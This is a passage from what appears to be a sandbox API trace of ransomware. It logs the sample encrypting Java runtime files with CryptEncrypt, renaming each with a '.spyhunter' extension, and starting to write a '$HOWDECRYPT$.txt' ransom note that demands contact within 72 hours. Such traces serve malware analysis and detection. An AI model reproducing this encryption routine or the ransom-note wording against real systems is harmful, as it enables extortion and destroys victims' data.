[0170.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac.spyhunter")) returned 1 [0170.992] GetProcessHeap () returned 0x2c0000 [0170.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.992] GetProcessHeap () returned 0x2c0000 [0170.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0170.992] GetProcessHeap () returned 0x2c0000 [0170.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04858 | out: hHeap=0x2c0000) returned 1 [0170.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5b8 | out: pbBuffer=0x57e5b8) returned 1 [0170.992] GetProcessHeap () returned 0x2c0000 [0170.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0170.992] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5b0*=0x30) returned 1 [0170.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0170.993] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg") returned 70 [0170.993] StrStrW (lpFirst="Petersburg", lpSrch=".txt") returned 0x0 [0170.993] GetProcessHeap () returned 0x2c0000 [0170.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0170.993] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e574*=0x3ec, lpOverlapped=0x0) returned 1 [0171.533] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffc14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.533] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3ec, lpNumberOfBytesWritten=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e574*=0x3ec, lpOverlapped=0x0) returned 1 [0171.533] GetProcessHeap () returned 0x2c0000 [0171.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.533] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.533] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x57e5b4*, lpNumberOfBytesWritten=0x57e574*=0x4, lpOverlapped=0x0) returned 1 [0171.533] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e574, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e574*=0x30, lpOverlapped=0x0) returned 1 [0171.533] CloseHandle (hObject=0xa0) returned 1 [0171.533] GetProcessHeap () returned 0x2c0000 [0171.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.533] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg.spyhunter") returned 80 [0171.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg.spyhunter")) returned 1 [0171.550] GetProcessHeap () returned 0x2c0000 [0171.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.550] GetProcessHeap () returned 0x2c0000 [0171.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0171.551] GetProcessHeap () returned 0x2c0000 [0171.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d470 | out: hHeap=0x2c0000) returned 1 [0171.551] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5b0 | out: pbBuffer=0x57e5b0) returned 1 [0171.551] GetProcessHeap () returned 0x2c0000 [0171.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0171.551] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5a8*=0x30) returned 1 [0171.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0171.587] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago") returned 59 [0171.587] StrStrW (lpFirst="Chicago", lpSrch=".txt") returned 0x0 [0171.587] GetProcessHeap () returned 0x2c0000 [0171.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0171.587] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e56c*=0x7a8, lpOverlapped=0x0) returned 1 [0171.722] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff858, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.722] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x7a8, lpNumberOfBytesWritten=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e56c*=0x7a8, lpOverlapped=0x0) returned 1 [0171.722] GetProcessHeap () returned 0x2c0000 [0171.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0171.722] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.723] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x57e5ac*, lpNumberOfBytesWritten=0x57e56c*=0x4, lpOverlapped=0x0) returned 1 [0171.723] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e56c*=0x30, lpOverlapped=0x0) returned 1 [0171.723] CloseHandle (hObject=0xa0) returned 1 [0171.723] GetProcessHeap () returned 0x2c0000 [0171.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.723] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago.spyhunter") returned 69 [0171.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago.spyhunter")) returned 1 [0171.724] GetProcessHeap () returned 0x2c0000 [0171.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.724] GetProcessHeap () returned 0x2c0000 [0171.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0171.724] GetProcessHeap () returned 0x2c0000 [0171.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60900 | out: hHeap=0x2c0000) returned 1 [0171.724] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5b0 | out: pbBuffer=0x57e5b0) returned 1 [0171.724] GetProcessHeap () returned 0x2c0000 [0171.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0171.724] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5a8*=0x30) returned 1 [0171.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0171.725] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas") returned 66 [0171.725] StrStrW (lpFirst="Bahia_Banderas", lpSrch=".txt") returned 0x0 [0171.725] GetProcessHeap () returned 0x2c0000 [0171.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0171.725] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e56c*=0x34c, lpOverlapped=0x0) returned 1 [0171.766] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffcb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.766] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e56c*=0x34c, lpOverlapped=0x0) returned 1 [0171.766] GetProcessHeap () returned 0x2c0000 [0171.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0171.766] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.766] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x57e5ac*, lpNumberOfBytesWritten=0x57e56c*=0x4, lpOverlapped=0x0) returned 1 [0171.766] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e56c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e56c*=0x30, lpOverlapped=0x0) returned 1 [0171.767] CloseHandle (hObject=0xa0) returned 1 [0171.767] GetProcessHeap () returned 0x2c0000 [0171.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.767] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas.spyhunter") returned 76 [0171.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas.spyhunter")) returned 1 [0171.768] GetProcessHeap () returned 0x2c0000 [0171.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.768] GetProcessHeap () returned 0x2c0000 [0171.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0171.768] GetProcessHeap () returned 0x2c0000 [0171.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04038 | out: hHeap=0x2c0000) returned 1 [0171.768] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5a8 | out: pbBuffer=0x57e5a8) returned 1 [0171.768] GetProcessHeap () returned 0x2c0000 [0171.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0171.768] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5a0*=0x30) returned 1 [0171.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0171.811] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta") returned 67 [0171.812] StrStrW (lpFirst="Salta", lpSrch=".txt") returned 0x0 [0171.812] GetProcessHeap () returned 0x2c0000 [0171.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0171.812] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e564*=0x215, lpOverlapped=0x0) returned 1 [0171.813] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.814] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x215, lpNumberOfBytesWritten=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e564*=0x215, lpOverlapped=0x0) returned 1 [0171.814] GetProcessHeap () returned 0x2c0000 [0171.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0171.814] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.814] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x57e5a4*, lpNumberOfBytesWritten=0x57e564*=0x4, lpOverlapped=0x0) returned 1 [0171.816] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e564*=0x30, lpOverlapped=0x0) returned 1 [0171.816] CloseHandle (hObject=0xa0) returned 1 [0171.816] GetProcessHeap () returned 0x2c0000 [0171.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.816] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta.spyhunter") returned 77 [0171.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta.spyhunter")) returned 1 [0171.817] GetProcessHeap () returned 0x2c0000 [0171.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.817] GetProcessHeap () returned 0x2c0000 [0171.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0171.817] GetProcessHeap () returned 0x2c0000 [0171.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03408 | out: hHeap=0x2c0000) returned 1 [0171.818] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5a8 | out: pbBuffer=0x57e5a8) returned 1 [0171.818] GetProcessHeap () returned 0x2c0000 [0171.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0171.818] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e5a0*=0x30) returned 1 [0171.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0171.818] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak") returned 56 [0171.818] StrStrW (lpFirst="Adak", lpSrch=".txt") returned 0x0 [0171.818] GetProcessHeap () returned 0x2c0000 [0171.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0171.819] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e564*=0x4c8, lpOverlapped=0x0) returned 1 [0171.965] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.966] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e564*=0x4c8, lpOverlapped=0x0) returned 1 [0171.966] GetProcessHeap () returned 0x2c0000 [0171.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0171.966] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.966] WriteFile (in: hFile=0xa0, lpBuffer=0x57e5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x57e5a4*, lpNumberOfBytesWritten=0x57e564*=0x4, lpOverlapped=0x0) returned 1 [0171.966] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e564, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e564*=0x30, lpOverlapped=0x0) returned 1 [0171.966] CloseHandle (hObject=0xa0) returned 1 [0171.966] GetProcessHeap () returned 0x2c0000 [0171.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.966] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak.spyhunter") returned 66 [0171.966] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak.spyhunter")) returned 1 [0171.968] GetProcessHeap () returned 0x2c0000 [0171.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.968] GetProcessHeap () returned 0x2c0000 [0171.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0171.968] GetProcessHeap () returned 0x2c0000 [0171.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fac0 | out: hHeap=0x2c0000) returned 1 [0171.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e5a0 | out: pbBuffer=0x57e5a0) returned 1 [0171.968] GetProcessHeap () returned 0x2c0000 [0171.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0171.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e598*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e598*=0x30) returned 1 [0171.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.984] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar") returned 65 [0171.984] StrStrW (lpFirst="access-bridge-32.jar", lpSrch=".txt") returned 0x0 [0171.985] GetProcessHeap () returned 0x2c0000 [0171.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0171.985] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e55c*=0x2800, lpOverlapped=0x0) returned 1 [0171.986] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.986] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e55c*=0x2800, lpOverlapped=0x0) returned 1 [0171.986] GetProcessHeap () returned 0x2c0000 [0171.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0171.986] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.986] WriteFile (in: hFile=0x178, lpBuffer=0x57e59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e55c, lpOverlapped=0x0 | out: lpBuffer=0x57e59c*, lpNumberOfBytesWritten=0x57e55c*=0x4, lpOverlapped=0x0) returned 1 [0171.987] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e55c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e55c*=0x30, lpOverlapped=0x0) returned 1 [0171.987] CloseHandle (hObject=0x178) returned 1 [0171.987] GetProcessHeap () returned 0x2c0000 [0171.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.987] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.spyhunter") returned 75 [0171.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\access-bridge-32.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\access-bridge-32.jar.spyhunter")) returned 1 [0171.988] GetProcessHeap () returned 0x2c0000 [0171.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.989] GetProcessHeap () returned 0x2c0000 [0171.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0171.989] GetProcessHeap () returned 0x2c0000 [0171.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03f68 | out: hHeap=0x2c0000) returned 1 [0171.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.991] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0171.991] WriteFile (in: hFile=0x178, lpBuffer=0x57e4d3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x57e4d3*, lpNumberOfBytesWritten=0x57e5fc*=0x127, lpOverlapped=0x0) returned 1 [0171.992] lstrlenA 